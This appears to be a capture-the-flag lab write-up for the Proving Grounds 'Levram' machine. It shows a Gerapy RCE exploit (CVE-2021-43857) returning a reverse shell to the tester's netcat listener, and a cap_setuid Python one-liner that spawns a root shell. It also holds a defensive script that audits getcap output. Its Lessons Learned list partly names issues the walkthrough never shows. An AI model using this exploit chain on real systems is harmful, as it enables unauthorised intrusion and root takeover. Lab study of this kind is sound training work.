
Proving Grounds - Levram (Linux)

Proving Grounds Levram Linux walkthrough covering reconnaissance, initial access, and privilege escalation.

Overview

Field                       Value
OS                          Linux
Difficulty                  Not specified
Attack Surface              Web application and exposed network services
Primary Entry Vector        Web RCE (CVE-2021-43857)
Privilege Escalation Path   Local enumeration -> misconfiguration abuse -> root

Credentials

No credentials obtained.

Reconnaissance


💡 Why this works
This stage maps the reachable attack surface and identifies where exploitation is most likely to succeed. Accurate service and content discovery reduces blind testing and drives targeted follow-up actions.

Initial Foothold


[Screenshot: captured during the initial foothold stage of the assessment]

At this stage, the following command(s) are executed to progress the attack chain and validate the next hypothesis. We are specifically looking for actionable indicators such as open services, exploitability, credential exposure, or privilege boundaries. Key flags and parameters are preserved to keep the workflow reproducible for follow-along testing.

python3 exploit.py -t 192.168.178.24 -p 8000 -L 192.168.45.166 -P 4444
❌[1:46][CPU:12][MEM:63][TUN0:192.168.45.166][...Levram/CVE-2021-43857-POC]
🐉 > python3 exploit.py -t 192.168.178.24 -p 8000 -L 192.168.45.166 -P 4444
[INFO] Logging in to Gerapy...
[INFO] Login successful.
[INFO] Fetching project list...
[INFO] Using project: test
[INFO] Fetching build details for project 'test'...
[INFO] Found project ID: 1
[INFO] Starting netcat listener...
[INFO] Sending exploit payload...
listening on [any] 4444 ...

nc -lvnp 4444
❌[1:46][CPU:18][MEM:64][TUN0:192.168.45.166][/home/n0z0]
🐉 > nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.45.166] from (UNKNOWN) [192.168.178.24] 51760
bash: cannot set terminal process group (846): Inappropriate ioctl for device
bash: no job control in this shell
app@ubuntu:~/gerapy$

Retrieved local.txt:

find / -iname local.txt 2>/dev/null
cat /home/app/local.txt
app@ubuntu:~$ find / -iname local.txt 2>/dev/null
/home/app/local.txt
app@ubuntu:~$ cat /home/app/local.txt
96a5b02c4dad361c9276ac69edfca332

💡 Why this works
The initial access step chains discovered weaknesses into executable control over the target. Successful foothold techniques are validated by command execution or interactive shell callbacks.

Privilege Escalation


Capability enumeration with getcap shows two binaries carrying file capabilities:

/usr/bin/python3.10 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep

Python carries cap_setuid, so it can call os.setuid(0) and spawn a shell as root:

/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'
id
app@ubuntu:/tmp$ /usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@ubuntu:/tmp# id

Retrieved proof.txt:

cat /root/proof.txt
root@ubuntu:/tmp# cat /root/proof.txt
97eb66bd4855acee30143adb50590ff0

💡 Why this works
Privilege escalation relies on local misconfigurations, unsafe permissions, and trusted execution paths. Enumerating and abusing these trust boundaries is the fastest route to root-level access.
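As an added example that is not part of the original walkthrough, the following audit script looks for exactly the kind of finding that gave root here: it parses getcap output in both the newer `path cap=ep` and the older `path = cap+ep` print formats and flags binaries whose effective or permitted file capabilities let a process change identity, read any file, or load kernel code. The sample output is constructed from the two lines shown above plus invented entries; the path /opt/tool/helper is hypothetical.

```python
import re
# Capabilities that on their own let a process become root, read any file
# or load kernel code. cap_setuid is the one abused on this box.
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
    "cap_dac_override", "cap_dac_read_search", "cap_sys_module",
    "cap_chown", "cap_fowner", "cap_setfcap",
}
# getcap prints "path cap_a,cap_b=ep" (libcap >= 2.41) or
# "path = cap_a,cap_b+ep" (older); an empty cap list ("path =ep") means all.
GETCAP_LINE = re.compile(
    r"^(?P<path>\S+)\s+=?\s*(?P<caps>[a-z0-9_,]*)[=+](?P<flags>[a-z]+)$"
)
# Constructed sample: the first two lines are the output shown in this
# walkthrough, the rest are invented entries for contrast.
SAMPLE_GETCAP_OUTPUT = """\
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep
/opt/tool/helper =ep
"""

def parse_getcap_line(line):
    """Return (path, set of caps, flags) for one getcap line, else None."""
    m = GETCAP_LINE.match(line.strip())
    if m is None:
        return None
    caps = set(m.group("caps").split(",")) if m.group("caps") else {"all"}
    return m.group("path"), caps, m.group("flags")

def find_risky_caps(getcap_output):
    """List (path, sorted dangerous caps) for every binary whose permitted
    or effective set grants one; an inheritable-only cap is not usable."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps, flags = parsed
        risky = ["all"] if "all" in caps else sorted(caps & DANGEROUS_CAPS)
        if risky and ("e" in flags or "p" in flags):
            findings.append((path, risky))
    return findings

if __name__ == "__main__":
    # Real audit: feed it the output of `getcap -r / 2>/dev/null`;
    # remediation for an unneeded capability is `setcap -r <path>`.
    for path, caps in find_risky_caps(SAMPLE_GETCAP_OUTPUT):
        print(f"RISK {path}: {','.join(caps)}")
```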

Lessons Learned / Key Takeaways

  • Validate framework debug mode and error exposure in production-like environments.
  • Restrict file permissions on scripts and binaries executed by privileged users or schedulers.
  • Harden sudo policies to avoid wildcard command expansion and scriptable privileged tools.
  • Treat exposed credentials and environment files as critical secrets.

Attack Flow


graph LR
    subgraph SCAN["🔍 1. Scanning"]
        direction TB
        A1[Rustscan] --> A2["Ports discovered<br/>22: SSH OpenSSH 8.9p1<br/>8000: HTTP WSGIServer"]
        A2 --> A3[Nmap service detection]
        A3 --> A4["Gerapy identified<br/>v0.9.7<br/>Python 3.10.6"]
        A4 --> A5[Web access confirmed]
        A5 --> A6["Vulnerability research<br/>CVE-2021-43857<br/>Gerapy RCE"]
    end
    subgraph INITIAL["🚪 2. Initial Access"]
        direction TB
        B1[Default credential test] --> B2["Login successful<br/>admin:admin"]
        B2 --> B3["Project created<br/>test"]
        B3 --> B4["CVE-2021-43857 Exploit<br/>Run exploit.py"]
        B4 --> B5["Reverse shell payload<br/>192.168.45.166:4444"]
        B5 --> B6["Shell obtained as app user"]
        B6 --> B7["local.txt<br/>96a5b02c4dad..."]
    end
    subgraph PRIVESC["⬆️ 3. Privilege Escalation"]
        direction TB
        C1["Run getcap<br/>Enumerate capabilities"] --> C2["python3.10 found<br/>cap_setuid=ep"]
        C2 --> C3["Abuse setuid capability<br/>os.setuid(0)"]
        C3 --> C4["Run Python exploit<br/>os.system(/bin/bash)"]
        C4 --> C5["Root shell obtained"]
        C5 --> C6["proof.txt<br/>97eb66bd48..."]
    end
    SCAN --> INITIAL
    INITIAL --> PRIVESC
    style A6 fill:#ff6b6b
    style B6 fill:#51cf66
    style B7 fill:#ffd43b
    style C5 fill:#ff6b6b
    style C6 fill:#ffd43b

References

  • CVE-2021-43857: https://nvd.nist.gov/vuln/detail/CVE-2021-43857
  • RustScan: https://github.com/RustScan/RustScan
  • Nmap: https://nmap.org/
  • feroxbuster: https://github.com/epi052/feroxbuster
  • Nuclei: https://github.com/projectdiscovery/nuclei
  • GTFOBins: https://gtfobins.org/
  • HackTricks Privilege Escalation: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html

This post is licensed under CC BY 4.0 by the author.